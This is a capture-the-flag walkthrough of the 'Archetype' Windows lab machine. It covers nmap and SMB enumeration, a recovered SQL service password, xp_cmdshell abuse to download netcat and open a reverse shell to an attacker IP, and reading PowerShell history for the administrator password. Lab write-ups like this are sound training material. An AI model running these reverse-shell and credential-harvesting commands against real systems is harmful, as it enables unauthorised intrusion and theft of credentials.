Enumeration
Service Scan with nmap
The scan reviews multiple open ports and we can safely assume that the OS of the system is Windows Server 2019. Additionally, there is an SQL Server, smb service etc. All the findings are below for you to analyze.
# nmap -sV -sC -p- -T4 -oA archetype archetype.htb
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-23T23:07:52
|_Not valid after: 2051-09-23T23:07:52
|_ssl-date: 2021-09-24T12:32:06+00:00; +19m28s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h43m29s, deviation: 3h07m50s, median: 19m28s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-09-24T05:31:57-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-24T12:32:00
|_ start_date: N/A
In-depth SMB Enumeration & Exploit
Using smbmap to map the smb shares and see their permissions. We have enumerated two read-only shares: backups and IPC.
# smbmap -u ' ' -p ' ' -H 10.10.10.27
[+] Guest session IP: 10.10.10.27:445 Name: archetype.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backups READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Analysing backups reveals a config file with a hardcoded password for the sql service.
# smbclient //10.10.10.27/backups
smb: \> ls
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
Pass: M3g4c0rp123 User: ARCHETYPE/sql_svc
# impacket-mssqlclient -windows-auth ARCHETYPE/sql_svc:[email protected]
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
To create a reverse shell I am gonna upload netcat onto the machine:
- Python server within windows binaries:
┌──(root💀kali)-[~]
└─# cd /usr/share/windows-resources/binaries
┌──(root💀kali)-[/usr/share/windows-resources/binaries]
└─# python3 -m http.server 8000
- Download netcat and save it as nc.exe within temp folder.
SQL> xp_cmdshell powershell "wget -UseBasicPrasing http://10.10.17.57:4444/nc.exe -OutFile %temp%/nc.exe"
- Setup netcat listener to catch the incomming connection:
# nc -nvlp 4444
- Execute nc.exe with cmd back to our listener:
SQL> xp_cmdshell powershell "%temp%\nc.exe 10.10.17.57 4444 -e cmd.exe"

Privilege Escalation
By default, the PowerShell in Windows 10 saves the last 4096 commands that are stored in a plain text file located in the profile of each user %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
And we got username and password: administrator : MEGACORP_4dm1n!!
C:\Users\sql_svc\AppData>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
Loging in as administrator: C$ working directory , -W to specify the workgroup and -U to specify the username.
# smbclient //10.10.10.27/C$ -W=ARCHETYPE -U=administrator 1 ⨯
Enter ARCHETYPE\administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd users\administrator\desktop
smb: \users\administrator\desktop\> get root.txt
getting file \users\administrator\desktop\root.txt of size 32 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \users\administrator\desktop\>
And finally, here is a gentle gorilla for you.